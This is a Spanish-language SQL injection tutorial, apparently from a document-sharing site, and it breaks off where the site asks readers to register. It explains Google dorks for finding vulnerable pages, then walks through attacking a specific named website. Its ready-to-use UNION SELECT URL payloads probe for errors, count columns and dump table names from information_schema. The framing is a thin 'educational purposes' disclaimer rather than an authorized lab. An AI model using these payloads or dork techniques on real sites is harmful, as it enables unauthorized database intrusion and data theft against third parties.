Sqli
Break Security Hackers_
Introducción:
Este tutorial tiene fines educativos, no me hago responsable de los actos cometidos.
Esta técnica es muy común y ,personalmente, es una de las mas sencillas de hacer y encontrar, de la cual consta en ir filtrando códigos logrando que nos devuelva una entrada deseada "por nosotros" la base de datos.
Materiales:
. UnNavegador WEB (Firefox)
. Un Buscador (En nuestro caso www.google.com)
. Ingenio para construir una dork
. Mucha pero mucha paciencia
Dorks:
Son combinaciones de palabras claves ,que se usa en el buscador, en la cual nos ayudara a encontrar sitios que contengan esa estructura.
Construyendo Nuestras Dorks para SQLi:
Hay que tener en cuenta que vamos a trabajar con la URL. Nuestras dorks tendrán un aspecto como el siguiente:
inurl:producto.php?id=
De la cual inurl: me esta diciendo que lo que quiero encontrar que lo busque en la dirección url,producto es una palabra que se me ocurrió, acá es donde ustedes deben ser creativos y experimentar con la palabra que se les ocurra, .php? me dice el formato, id= nos busca con resultados, que va a serla relación con la base de datos, del cual podemos jugar tambien en esta parte con otras palabras como pag= o cat= , etc..
Otras
inurl:mercaderia.php?id=
inurl:producto.php?pag=
inurl:comercio.php?cat=
Yo usare la siguiente Dork:
Buscando la Victima:
Eso nos muestra como nos busco una url que contenga lo que pediamos.
Seleccionando una web:
Bueno, acá es donde entra gran parte lapaciencia en juego, ya que no todas las web van a ser vulnerables a este metodo.
Yo seleccione esta web:
http://biocanvalencia.com/producto.php?id=107
Como vera contiene las palabras de nuestra dork.
Bueno, ¿Qué hacemos ahora?, tenemos que averiguar si es o no vulnerable a este tipo de ataque. ¿Como lo hacemos? introduciendo caracteres especiales ( ',-) después del numero,¿Qué números?los que están despues del =
http://biocanvalencia.com/producto.php?id=107'
En el caso que no sea vulnerable, la web seguir normal o nos redireccionara a otra pagina. Y en el caso que sea vulnerable nos mostrara un error como el siguiente:
Nuestra web es vulnerable a SQLi :
Comenzando con el ataque:
Continuamos haciendo llamadas a la Base de Datos desde la URL, solo que ahoradelante del numero agregaremos - y despues del numero agregaremos +union+select+1-- . Este ultimo numero lo vamos a ir alternando hasta conseguir que el error que nos muestra desaparesca. Ejemplo:
http://biocanvalencia.com/producto.php?id=-107+union+select+1,2--
Desaparece el error despues de ir adicionando numeros, y nos mostrara unos numeros http://biocanvalencia.com/producto.php?id=-107+union+select+1,2,3,4,5,6,7,8,9,10,11--
Acá nos a tirado 2 y 4. De la cual usare el primero, que es el 2 para averiguar sus tablas
Sacando las Tablas:
Bueno, para sacar las tablas tenemos 2 formas "que hasta ahora conosco", las podemos sacar todas de un solo tiro o ir sacando una por una. En ambos caso remplazaremos con códigos uno de los números que nos arrojo, dentro de la URL Sacando todas las tablas de un solo tiro:
Bueno esta es una de las partes mas divertidas de SQLi, para sacar las tablas
¿Como lo haremos?
Pues como anteriormente mencione, remplazaremos el 2 de la url, con el siguiente codigo:
replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29
y al final de la url le agregaremos lo siguiente:
+from+information_schema.tableshttp://biocanvalencia.com/producto.php?id=-107+union+select+1,replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29 ,3,4,5,6,7,8,9,10,11+from+information_schema.tables--
Sacando tablas una por una:
Para sacar las tablas una por una lo que haremos sera lo siguiente, remplazaremos el numero que elegido "2" por el siguiente codigo:
table_name
y al final de la url pondremos como en la...
Regístrate para leer el documento completo.